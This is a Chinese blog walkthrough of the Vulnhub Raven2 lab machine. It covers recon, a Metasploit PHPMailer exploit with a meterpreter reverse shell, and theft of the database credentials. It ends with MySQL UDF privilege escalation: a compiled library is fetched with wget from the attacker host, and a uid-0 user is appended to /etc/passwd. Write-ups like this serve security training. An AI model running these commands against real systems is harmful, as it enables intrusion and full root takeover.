Raven2靶机渗透测试

先对目标靶机的网段进行扫描,用nmap命令

nmap -sS 10.9.63.0/24

在这里插入图片描述
发现目标IP为10.9.63.96(每个人扫描的ip在不同网段都不一样,根据自身情况进行甄别)看看都开启了哪些端口,发现有22、80、111端口开放,打开网页输入ip查看一下80端口http服务网页
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/fd6150d8a37a4761aaf7d75056fbe6be.png
用nmap进行详细信息扫描

nmap -sT -sV -sC -O -p22,80,111 10.9.63.96

在这里插入图片描述
在用dirb扫描一下目录

dirb http://10.9.63.96

在这里插入图片描述
在这里插入图片描述
发现有这个目录,我们复制链接打开看一下有什么信息内容
在这里插入图片描述
发现了一些目录,按个看看搜集有用信息
在这里插入图片描述
根据搜集到的信息,网站使用apacbe框架,用了PHPMailer,是发送邮件的一个扩展包,版本是5.2.16
在这里插入图片描述
我们用kali里面的搜索漏洞工具msf搜索一下PHPMailer
在这里插入图片描述
发现两个漏洞,我们查看一下怎么使用

info 0

在这里插入图片描述
使用这个漏洞

use 0

在这里插入图片描述
发现没有攻击载合,给了一个默认的攻击载合,我们就用它给的默认载合

set payload php/meterpreter/reverse_tcp

在这里插入图片描述
看一下配置信息

show options

在这里插入图片描述
根据要求配置一下信息

set RHOSTS 10.9.63.96
set TARGETURI /contact.php
set WEB_ROOT /var/www/html
run

在这里插入图片描述
然后复制红框里的目录,在网页打开,利用shell反弹进去,大约需要5分钟
在这里插入图片描述
进来之后输入shell,然后输入python3 -c “import pty;pty.spawn(‘/bin/bash’)”,进入交互模式
在这里插入图片描述
然后找到这个文件cat一下,找到里面数据库的账号和密码
在这里插入图片描述
在这里插入图片描述
登录进入数据库,输入账号和密码(root,R@v3nSecurity)

mysql -uroot -p

在这里插入图片描述
在开启一个终端,查找 mysql udf 漏洞

searchsploit mysql udf

在这里插入图片描述
下载1518.c文件

searchsploit -m 1518.c

在这里插入图片描述
vim一下根据里面的使用方法进行配置
在这里插入图片描述
更改文件名称为raptor_udf2.c,按照下面配置进行操作

mv 1518.c raptor_udf2.c
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

在这里插入图片描述
再次进入到数据库

mysql -u root -p

在这里插入图片描述
开启http服务

python3 -m http.server 80

在这里插入图片描述
在后台服务下载raptor_udf2.so文件,下载到了/tmp目录下

wget 10.9.63.146/raptor_udf2.so

在这里插入图片描述
进入数据库,在mysql数据库中操作

insert into lmx values(load_file('/tmp/raptor_udf2.so'));
select * from lmx into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;

在这里插入图片描述
设置一个新密码

mkpasswd

在这里插入图片描述
写入一个用户

select do_system('echo "lmxyyds:56Xh0RAeByXi.:0:0::/root:/bin/bash">>/etc/passwd');

在这里插入图片描述
退出数据库,cat一下用户里面新增没有

cat /etc/passwd

在这里插入图片描述
在这里插入图片描述
发现已经有刚刚新增的用户了,使用 su 命令切换用户

su lmxyyds

在这里插入图片描述
进入root管理员用户查看id,发现uid为0,已经是管理员权限,提权成功啦!!!
我们cat一下root下的root.txt文件,goodjob you!
在这里插入图片描述

  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值